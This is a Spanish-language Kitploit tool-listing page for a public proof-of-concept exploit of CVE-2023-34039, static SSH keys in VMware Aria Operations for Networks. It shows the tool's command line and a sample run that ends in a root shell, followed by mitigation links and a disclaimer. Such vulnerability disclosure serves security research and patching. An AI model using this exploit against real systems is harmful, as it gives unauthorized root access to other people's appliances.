Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2023-34039 — VMWare Aria Operations for Networks (vRealize Network Insight) RCE por clave SSH estática (CVE-2023-34039) | Kitploit
Herramientas/GitHubGitHub/sinsinology/cve-2023-34039
Escalada de PrivilegiosAnálisis de VulnerabilidadesExplotaciónPruebas de PenetraciónSeguridad en la NubeHerramienta de Acceso Remoto
GitHubsinsinology/cve-2023-34039

CVE-2023-34039

VMWare Aria Operations for Networks (vRealize Network Insight) RCE por clave SSH estática (CVE-2023-34039)

Ver Repositorio
9731hace 2 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2023-34039

PoC para CVE-2023-34039 VMWare Aria Operations for Networks (vRealize Network Insight) RCE por clave SSH estática

Análisis técnico

Un análisis de causa raíz de la vulnerabilidad se puede encontrar en mi blog:

https://summoning.team/blog/vmware-vrealize-network-insight-rce-cve-2023-34039/

poc

Resumen

VMWare Aria Operations for Networks (vRealize Network Insight) desde la versión 6.0 hasta la 6.10 no regeneraba las claves ssh de los usuarios support y ubuntu, lo que permitía a un atacante con acceso SSH obtener una shell root en este producto.

Este problema fue reportado a VMWare por Harsh Jaiswal (@rootxharsh) y Rahul Maini (@iamnoooob) en ProjectDiscovery Research

Simplemente escribí el exploit, si se le puede llamar así, porque básicamente es un envoltorio de comandos ssh.

Uso

root@kitploit:~
python CVE-2023-34039.py --target 192.168.1.16
(!) VMWare Aria Operations for Networks (vRealize Network Insight) Static SSH key RCE (CVE-2023-34039)

(*) Exploit by Sina Kheirkhah (@SinSinology) of Summoning Team (@SummoningTeam)

(*) Trying key: keys/vrni-6.2.0/id_rsa_vnera_keypair_6.2.0_collector

(*) Trying key: keys/vrni-6.2.0/id_rsa_vnera_keypair_6.2.0_platform

(*) Trying key: keys/vrni-6.10.0/id_rsa_vnera_keypair_6.10.0_platform


********************************** ATTENTION **********************************
 NTP Service is not healthy.
 IMPACT: It may affect the proper working of other services.
 ACTION: Restore the service using 'ntp' CLI command.
********************************** ATTENTION **********************************
support@vrni-platform-release:~$ sudo -i
root@vrni-platform-release:~# id
uid=0(root) gid=0(root) groups=0(root)
root@vrni-platform-release:~# hostname
vrni-platform-release
root@vrni-platform-release:~# 

Mitigaciones

Actualice a la última versión o mitigue siguiendo las instrucciones del Progress Advisory

  • https://www.vmware.com/security/advisories/VMSA-2023-0018.html

Síguenos para más investigaciones de seguridad:

  • SinSinology
  • SummoningTeam

Aviso legal

Este software ha sido creado puramente con fines de investigación académica y para el desarrollo de técnicas defensivas efectivas, y no está destinado a ser utilizado para atacar sistemas excepto cuando esté explícitamente autorizado. Los mantenedores del proyecto no son responsables del mal uso del software. Úsalo con responsabilidad.

Descargar herramienta